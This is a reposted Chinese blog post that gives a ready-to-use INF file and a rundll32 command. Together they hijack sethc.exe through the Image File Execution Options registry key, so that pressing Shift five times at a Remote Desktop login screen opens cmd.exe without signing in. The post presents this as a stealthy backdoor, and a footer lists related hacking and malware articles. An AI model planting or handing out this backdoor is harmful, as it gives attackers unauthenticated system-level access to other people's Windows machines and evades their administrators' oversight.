巧妙利用inf文件添加shift后门

简介:

将下面的代码保存成inf文件


[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name

[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe,debugger,0x00000000,c:\\windows\\system32\\cmd.exe

然后上传到一个可以执行目录,比如我这里上传到c:\windows\temp\i.inf 然后在命令行执行



rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf

然后远程登录3389,按5下shift即可跳出cmd.exe


为什么要命令行?隐蔽性?大家自行掂量




















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/457220,如需转载请自行联系原作者

相关文章
|
7月前
|
运维
简记:清理指定后缀名文件的 powerhsell 小脚本
简记:清理指定后缀名文件的 powerhsell 小脚本
63 0
|
3月前
|
网络协议 安全
使用映像劫持,ARP欺骗,autorun.inf等技术的AV杀手mgemtjk.exe,sb.exe,qodwjay.exe,smsovct.exe等1
使用映像劫持,ARP欺骗,autorun.inf等技术的AV杀手mgemtjk.exe,sb.exe,qodwjay.exe,smsovct.exe等1
|
安全 网络安全 数据安全/隐私保护
网络安全实验十二 window 2003 Shift后门实验
网络安全实验十二 window 2003 Shift后门实验
157 1
|
API Windows
另类屏蔽系统键(Ctrl+Alt+Del)兼谈www.vbaccelerator.com网站
如果把VB仅仅当成一个工具,那是非常好的事,如果把它作为全部,那是最可悲的事。观摩高手的编码,无一不显示这个高手对底层精湛的了解。读读梁肇新的《编程高手箴言》也许你感悟更多。
839 0
VBS脚本操作网页元素
=================打开百度,点击百度按钮==================== Dim btn,ieSet ie = WScript.CreateObject("InternetExplorer.
1282 0
VBS基础篇 - VBScript过程
VBS基础篇 - VBScript过程     在 VBScript 中,过程被分为两类:Sub 过程和 Function 过程。  Sub过程 Sub 过程是包含在 Sub 和 End Sub 语句之间的一组 VBScript 语句。
937 0
|
数据安全/隐私保护